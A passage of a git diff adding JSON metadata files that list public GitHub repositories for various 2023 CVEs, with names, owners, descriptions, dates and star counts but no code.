+ "name": "PHP-CVE-2023-2023-2640-POC-Escalation",
+ "full_name": "druxter-x\/PHP-CVE-2023-2023-2640-POC-Escalation",
+ "owner": {
+ "login": "druxter-x",
+ "id": 1912258,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1912258?v=4",
+ "html_url": "https:\/\/github.com\/druxter-x"
+ },
+ "html_url": "https:\/\/github.com\/druxter-x\/PHP-CVE-2023-2023-2640-POC-Escalation",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-15T16:35:59Z",
+ "updated_at": "2024-02-15T16:39:41Z",
+ "pushed_at": "2024-02-15T17:10:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2024.json b/2023/CVE-2023-2024.json
new file mode 100644
index 0000000000..d627b9b91f
--- /dev/null
+++ b/2023/CVE-2023-2024.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 727309635,
+ "name": "CVE-2023-2024",
+ "full_name": "team890\/CVE-2023-2024",
+ "owner": {
+ "login": "team890",
+ "id": 138309416,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/138309416?v=4",
+ "html_url": "https:\/\/github.com\/team890"
+ },
+ "html_url": "https:\/\/github.com\/team890\/CVE-2023-2024",
+ "description": "For Aina",
+ "fork": false,
+ "created_at": "2023-12-04T15:55:22Z",
+ "updated_at": "2024-05-30T11:28:31Z",
+ "pushed_at": "2024-05-30T11:28:28Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20273.json b/2023/CVE-2023-20273.json
new file mode 100644
index 0000000000..292cfa04ec
--- /dev/null
+++ b/2023/CVE-2023-20273.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 729425545,
+ "name": "CVE-2023-20273",
+ "full_name": "smokeintheshell\/CVE-2023-20273",
+ "owner": {
+ "login": "smokeintheshell",
+ "id": 19311214,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19311214?v=4",
+ "html_url": "https:\/\/github.com\/smokeintheshell"
+ },
+ "html_url": "https:\/\/github.com\/smokeintheshell\/CVE-2023-20273",
+ "description": "CVE-2023-20273 Exploit PoC",
+ "fork": false,
+ "created_at": "2023-12-09T07:25:43Z",
+ "updated_at": "2024-05-29T22:09:37Z",
+ "pushed_at": "2024-04-01T18:59:05Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2033.json b/2023/CVE-2023-2033.json
new file mode 100644
index 0000000000..99a481bcf6
--- /dev/null
+++ b/2023/CVE-2023-2033.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 673776946,
+ "name": "CVE-2023-2033",
+ "full_name": "mistymntncop\/CVE-2023-2033",
+ "owner": {
+ "login": "mistymntncop",
+ "id": 105329747,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4",
+ "html_url": "https:\/\/github.com\/mistymntncop"
+ },
+ "html_url": "https:\/\/github.com\/mistymntncop\/CVE-2023-2033",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-02T11:55:30Z",
+ "updated_at": "2024-06-21T00:11:23Z",
+ "pushed_at": "2023-08-15T03:31:13Z",
+ "stargazers_count": 58,
+ "watchers_count": 58,
+ "has_discussions": false,
+ "forks_count": 17,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 17,
+ "watchers": 58,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 679512175,
+ "name": "CVE-2023-2033",
+ "full_name": "tianstcht\/CVE-2023-2033",
+ "owner": {
+ "login": "tianstcht",
+ "id": 32213198,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32213198?v=4",
+ "html_url": "https:\/\/github.com\/tianstcht"
+ },
+ "html_url": "https:\/\/github.com\/tianstcht\/CVE-2023-2033",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-17T02:40:42Z",
+ "updated_at": "2023-08-17T02:40:43Z",
+ "pushed_at": "2023-08-17T02:41:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20562.json b/2023/CVE-2023-20562.json
new file mode 100644
index 0000000000..c2ff77907f
--- /dev/null
+++ b/2023/CVE-2023-20562.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 680961189,
+ "name": "HITCON-2023-Demo-CVE-2023-20562",
+ "full_name": "zeze-zeze\/HITCON-2023-Demo-CVE-2023-20562",
+ "owner": {
+ "login": "zeze-zeze",
+ "id": 33378686,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33378686?v=4",
+ "html_url": "https:\/\/github.com\/zeze-zeze"
+ },
+ "html_url": "https:\/\/github.com\/zeze-zeze\/HITCON-2023-Demo-CVE-2023-20562",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-21T00:31:50Z",
+ "updated_at": "2024-01-16T08:52:16Z",
+ "pushed_at": "2023-08-21T00:33:08Z",
+ "stargazers_count": 54,
+ "watchers_count": 54,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 54,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 681042384,
+ "name": "HITCON-2023-Demo-CVE-2023-20562",
+ "full_name": "passwa11\/HITCON-2023-Demo-CVE-2023-20562",
+ "owner": {
+ "login": "passwa11",
+ "id": 112363374,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4",
+ "html_url": "https:\/\/github.com\/passwa11"
+ },
+ "html_url": "https:\/\/github.com\/passwa11\/HITCON-2023-Demo-CVE-2023-20562",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-21T06:25:09Z",
+ "updated_at": "2024-01-12T02:38:02Z",
+ "pushed_at": "2023-08-21T06:25:26Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20593.json b/2023/CVE-2023-20593.json
new file mode 100644
index 0000000000..97a8553002
--- /dev/null
+++ b/2023/CVE-2023-20593.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 671214196,
+ "name": "stop-zenbleed-win",
+ "full_name": "sbaresearch\/stop-zenbleed-win",
+ "owner": {
+ "login": "sbaresearch",
+ "id": 1678129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1678129?v=4",
+ "html_url": "https:\/\/github.com\/sbaresearch"
+ },
+ "html_url": "https:\/\/github.com\/sbaresearch\/stop-zenbleed-win",
+ "description": "PowerShell script to apply Zenbleed (CVE-2023-20593) MSR workaround on Windows",
+ "fork": false,
+ "created_at": "2023-07-26T20:03:11Z",
+ "updated_at": "2023-09-08T12:14:54Z",
+ "pushed_at": "2023-07-31T09:21:45Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-20593",
+ "windows",
+ "zenbleed"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20598.json b/2023/CVE-2023-20598.json
new file mode 100644
index 0000000000..b8f18a1c93
--- /dev/null
+++ b/2023/CVE-2023-20598.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 813857053,
+ "name": "CVE-2023-20598-PDFWKRNL",
+ "full_name": "H4rk3nz0\/CVE-2023-20598-PDFWKRNL",
+ "owner": {
+ "login": "H4rk3nz0",
+ "id": 54619779,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54619779?v=4",
+ "html_url": "https:\/\/github.com\/H4rk3nz0"
+ },
+ "html_url": "https:\/\/github.com\/H4rk3nz0\/CVE-2023-20598-PDFWKRNL",
+ "description": "CVE-2023-20598 Kernel Driver - Elevation of Privilege",
+ "fork": false,
+ "created_at": "2024-06-11T22:03:51Z",
+ "updated_at": "2024-06-24T08:34:57Z",
+ "pushed_at": "2024-06-13T21:34:45Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20887.json b/2023/CVE-2023-20887.json
new file mode 100644
index 0000000000..afa5e0af19
--- /dev/null
+++ b/2023/CVE-2023-20887.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696042954,
+ "name": "CVE-2023-20887",
+ "full_name": "Malwareman007\/CVE-2023-20887",
+ "owner": {
+ "login": "Malwareman007",
+ "id": 86009160,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4",
+ "html_url": "https:\/\/github.com\/Malwareman007"
+ },
+ "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2023-20887",
+ "description": "VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)",
+ "fork": false,
+ "created_at": "2023-09-25T00:41:45Z",
+ "updated_at": "2023-10-24T17:46:48Z",
+ "pushed_at": "2023-09-25T00:48:41Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20909.json b/2023/CVE-2023-20909.json
new file mode 100644
index 0000000000..c1a57e7dec
--- /dev/null
+++ b/2023/CVE-2023-20909.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 730068512,
+ "name": "frameworks_base_AOSP10_r33_CVE-2023-20909",
+ "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20909",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20909",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-11T06:14:11Z",
+ "updated_at": "2023-12-11T06:20:09Z",
+ "pushed_at": "2023-12-11T06:35:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 730110101,
+ "name": "platform_frameworks_base_AOSP10_r33_CVE-2023-20909",
+ "full_name": "Trinadh465\/platform_frameworks_base_AOSP10_r33_CVE-2023-20909",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_AOSP10_r33_CVE-2023-20909",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-11T08:23:14Z",
+ "updated_at": "2023-12-11T08:23:15Z",
+ "pushed_at": "2023-12-11T08:23:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20911.json b/2023/CVE-2023-20911.json
new file mode 100644
index 0000000000..1fbc2cd87e
--- /dev/null
+++ b/2023/CVE-2023-20911.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 721630428,
+ "name": "frameworks_base_AOSP10_r33_CVE-2023-20911",
+ "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20911",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20911",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-21T13:05:00Z",
+ "updated_at": "2023-11-21T13:13:02Z",
+ "pushed_at": "2023-11-23T05:03:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20918.json b/2023/CVE-2023-20918.json
new file mode 100644
index 0000000000..6f15aa514e
--- /dev/null
+++ b/2023/CVE-2023-20918.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 699801559,
+ "name": "platform_frameworks_base_AOSP_10_r33_CVE-2023-20918",
+ "full_name": "pazhanivel07\/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918",
+ "owner": {
+ "login": "pazhanivel07",
+ "id": 97434034,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4",
+ "html_url": "https:\/\/github.com\/pazhanivel07"
+ },
+ "html_url": "https:\/\/github.com\/pazhanivel07\/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-03T11:21:35Z",
+ "updated_at": "2023-10-03T11:29:10Z",
+ "pushed_at": "2023-10-03T11:29:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 699813635,
+ "name": "platform_frameworks_base_CVE-2023-20918",
+ "full_name": "Trinadh465\/platform_frameworks_base_CVE-2023-20918",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_CVE-2023-20918",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-03T11:52:16Z",
+ "updated_at": "2023-10-03T11:59:03Z",
+ "pushed_at": "2023-10-03T11:58:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20921.json b/2023/CVE-2023-20921.json
new file mode 100644
index 0000000000..a318c59d47
--- /dev/null
+++ b/2023/CVE-2023-20921.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 724965419,
+ "name": "frameworks_base_android-6.0.1_r22_CVE-2023-20921",
+ "full_name": "Trinadh465\/frameworks_base_android-6.0.1_r22_CVE-2023-20921",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_android-6.0.1_r22_CVE-2023-20921",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-29T06:42:43Z",
+ "updated_at": "2023-11-29T06:50:59Z",
+ "pushed_at": "2023-11-29T06:50:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20955.json b/2023/CVE-2023-20955.json
new file mode 100644
index 0000000000..c922e856e5
--- /dev/null
+++ b/2023/CVE-2023-20955.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 710323089,
+ "name": "packages_apps_Settings_AOSP10_r33_CVE-2023-20955",
+ "full_name": "Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2023-20955",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2023-20955",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-26T13:19:06Z",
+ "updated_at": "2023-10-26T13:22:14Z",
+ "pushed_at": "2023-10-26T13:22:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20963.json b/2023/CVE-2023-20963.json
new file mode 100644
index 0000000000..26e98a3c9a
--- /dev/null
+++ b/2023/CVE-2023-20963.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 707608234,
+ "name": "frameworks_base_AOSP10_r33_CVE-2023-20963",
+ "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20963",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20963",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-20T09:11:00Z",
+ "updated_at": "2023-10-20T09:17:03Z",
+ "pushed_at": "2023-10-20T09:16:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21086.json b/2023/CVE-2023-21086.json
new file mode 100644
index 0000000000..647b22bc16
--- /dev/null
+++ b/2023/CVE-2023-21086.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 709780898,
+ "name": "packages_apps_Settings_CVE-2023-21086",
+ "full_name": "Trinadh465\/packages_apps_Settings_CVE-2023-21086",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_CVE-2023-21086",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-25T11:42:32Z",
+ "updated_at": "2023-10-25T11:54:12Z",
+ "pushed_at": "2023-10-25T12:25:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21094.json b/2023/CVE-2023-21094.json
new file mode 100644
index 0000000000..3f9d8647d4
--- /dev/null
+++ b/2023/CVE-2023-21094.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 709692273,
+ "name": "frameworks_native_AOSP-10_r33_CVE-2023-21094",
+ "full_name": "Trinadh465\/frameworks_native_AOSP-10_r33_CVE-2023-21094",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_native_AOSP-10_r33_CVE-2023-21094",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-25T07:54:39Z",
+ "updated_at": "2023-10-25T07:56:58Z",
+ "pushed_at": "2023-10-25T08:11:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21097.json b/2023/CVE-2023-21097.json
new file mode 100644
index 0000000000..0461f7e88a
--- /dev/null
+++ b/2023/CVE-2023-21097.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 710167473,
+ "name": "frameworks_base_AOSP10_r33_CVE-2023-21097",
+ "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21097",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21097",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-26T06:46:14Z",
+ "updated_at": "2023-10-26T06:52:57Z",
+ "pushed_at": "2023-10-26T06:51:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 710334684,
+ "name": "frameworks_base_AOSP10_r33_CVE-2023-21097",
+ "full_name": "uthrasri\/frameworks_base_AOSP10_r33_CVE-2023-21097",
+ "owner": {
+ "login": "uthrasri",
+ "id": 145666390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4",
+ "html_url": "https:\/\/github.com\/uthrasri"
+ },
+ "html_url": "https:\/\/github.com\/uthrasri\/frameworks_base_AOSP10_r33_CVE-2023-21097",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-26T13:44:13Z",
+ "updated_at": "2023-10-26T15:14:58Z",
+ "pushed_at": "2023-10-26T19:58:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21109.json b/2023/CVE-2023-21109.json
new file mode 100644
index 0000000000..24fc27b684
--- /dev/null
+++ b/2023/CVE-2023-21109.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 720349935,
+ "name": "frameworks_base_AOSP10_CVE-2023-21109r33_",
+ "full_name": "Trinadh465\/frameworks_base_AOSP10_CVE-2023-21109r33_",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_CVE-2023-21109r33_",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-18T07:50:57Z",
+ "updated_at": "2023-11-18T07:50:57Z",
+ "pushed_at": "2023-11-18T07:50:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 720351156,
+ "name": "frameworks_base_AOSP10_r33_CVE-2023-21109",
+ "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21109",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21109",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-18T07:56:12Z",
+ "updated_at": "2023-11-18T08:39:11Z",
+ "pushed_at": "2023-11-18T11:41:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21118.json b/2023/CVE-2023-21118.json
new file mode 100644
index 0000000000..6aa0c1a771
--- /dev/null
+++ b/2023/CVE-2023-21118.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 729085770,
+ "name": "frameworks_native_AOSP-10_r33_CVE-2023-21118",
+ "full_name": "Trinadh465\/frameworks_native_AOSP-10_r33_CVE-2023-21118",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_native_AOSP-10_r33_CVE-2023-21118",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-08T11:29:23Z",
+ "updated_at": "2023-12-08T11:31:11Z",
+ "pushed_at": "2023-12-08T11:31:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 763868272,
+ "name": "frameworks_native_AOSP10_r33_CVE-2023-21118",
+ "full_name": "Satheesh575555\/frameworks_native_AOSP10_r33_CVE-2023-21118",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_native_AOSP10_r33_CVE-2023-21118",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-27T03:59:23Z",
+ "updated_at": "2024-02-27T04:13:46Z",
+ "pushed_at": "2024-02-27T04:14:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
